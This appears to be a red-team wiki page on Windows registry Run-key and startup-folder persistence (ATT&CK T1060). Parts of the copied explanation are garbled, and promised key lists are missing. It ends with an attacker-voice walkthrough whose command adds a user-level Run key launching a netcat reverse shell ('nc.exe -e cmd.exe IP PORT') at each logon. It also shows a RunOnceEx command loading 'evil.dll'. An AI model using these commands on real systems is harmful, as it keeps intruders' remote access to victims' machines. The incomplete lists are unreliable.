Comment on page
Registry Keys / StartUp Folder
ID: T1060 Tactic: Persistence
Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
The following run keys are created by default on Windows Systems:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceExis also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as dependency. For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx:
reg add KHLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll"
The following Registry keys can be used to set startup folder items for persistence:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
The following Registry Keys can control automatic startup services during boot:
using policy settings to specify startup programs created corresponding values in either of two Registry keys:
The Winlogon key controls actions that occur when a suer logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The
These sub keys can automatically launch programs.
Programs listed in the load value of the registry key
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windowsrun when any user logs on.
By default, the multi string BootExecute value of the registry key
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manageris set to autocheck autochk*. This value causes Windows, at startup to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.
Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use Masquerading to make the Registry entries look as if they are associated with legitimate programs.
In this example we have gained a foothold on the host and been on the internal network for a while but assuming a well organized company they know to reboot or shutdown their workstations in case of breaches wwhere our shell's would die in that case and then you will need to gain access again!!. But now we will try persistence one of many techniques to keep access to our victim host.
The good thing here is that we can keep persistence and modify registry keys at a user level, without Administrator privileges.
In this example we will have a command executed to keep our shell alive:
REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\CurrentVersion\Run /v 1 /d "C:\Users\dmcxblue\Downloads\nc.exe -e cmd.exe IP PORT"
And once the user Logs out, Restarts or any that would kill our shell we get a callback every time this specific user log's onto the workstation.